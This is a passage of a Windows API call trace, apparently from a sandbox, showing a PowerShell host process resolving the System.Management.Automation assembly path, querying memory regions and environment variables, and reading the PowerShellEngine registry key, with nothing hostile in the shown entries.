lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.092] GetLastError () returned 0xcb [0055.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.092] GetLastError () returned 0xcb [0055.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.092] GetLastError () returned 0xcb [0055.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.092] GetLastError () returned 0xcb [0055.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.092] GetLastError () returned 0xcb [0055.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdca4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.093] GetLastError () returned 0xcb [0055.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.093] GetLastError () returned 0xcb [0055.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.093] GetLastError () returned 0xcb [0055.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.093] GetLastError () returned 0xcb [0055.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdca4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.108] GetLastError () returned 0xcb [0055.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.108] GetLastError () returned 0xcb [0055.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.108] GetLastError () returned 0xcb [0055.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdca4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.108] GetLastError () returned 0xcb [0055.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.108] GetLastError () returned 0xcb [0055.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.108] GetLastError () returned 0xcb [0055.108] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.109] GetLastError () returned 0xcb [0055.115] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.129] GetLastError () returned 0xcb [0055.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.132] GetLastError () returned 0xcb [0055.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.134] GetLastError () returned 0xcb [0055.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.140] GetLastError () returned 0xcb [0055.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.143] GetLastError () returned 0xcb [0055.145] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.146] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.218] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0055.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.226] GetLastError () returned 0xcb [0061.682] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3b9388 [0061.682] GetLastError () returned 0x0 [0061.683] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3b9410 [0061.683] GetLastError () returned 0x0 [0061.836] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.864] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.867] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.867] VirtualQuery (in: lpAddress=0x2cc884, lpBuffer=0x2cd884, dwLength=0x1c | out: lpBuffer=0x2cd884*(BaseAddress=0x2cc000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.892] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.892] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.892] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.892] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.893] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.894] VirtualQuery (in: lpAddress=0x2cd1d0, lpBuffer=0x2ce1d0, dwLength=0x1c | out: lpBuffer=0x2ce1d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.904] GetLastError () returned 0xcb [0061.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.904] GetLastError () returned 0xcb [0061.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.904] GetLastError () returned 0xcb [0061.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.904] GetLastError () returned 0xcb [0061.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.904] GetLastError () returned 0xcb [0061.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.927] GetLastError () returned 0xcb [0061.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.927] GetLastError () returned 0xcb [0061.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.927] GetLastError () returned 0xcb [0061.927] VirtualQuery (in: lpAddress=0x2cd4f8, lpBuffer=0x2ce4f8, dwLength=0x1c | out: lpBuffer=0x2ce4f8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.928] GetLastError () returned 0xcb [0061.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.928] GetLastError () returned 0xcb [0061.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.928] GetLastError () returned 0xcb [0061.928] VirtualQuery (in: lpAddress=0x2cd4f0, lpBuffer=0x2ce4f0, dwLength=0x1c | out: lpBuffer=0x2ce4f0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.928] VirtualQuery (in: lpAddress=0x2cd1a4, lpBuffer=0x2ce1a4, dwLength=0x1c | out: lpBuffer=0x2ce1a4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.928] VirtualQuery (in: lpAddress=0x2cd1a4, lpBuffer=0x2ce1a4, dwLength=0x1c | out: lpBuffer=0x2ce1a4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.930] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cec2c | out: phkResult=0x2cec2c*=0x398) returned 0x0 [0061.931] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cec74, lpData=0x0, lpcbData=0x2cec70*=0x0 | out: lpType=0x2cec74*=0x1, lpData=0x0, lpcbData=0x2cec70*=0x56) returned 0x0 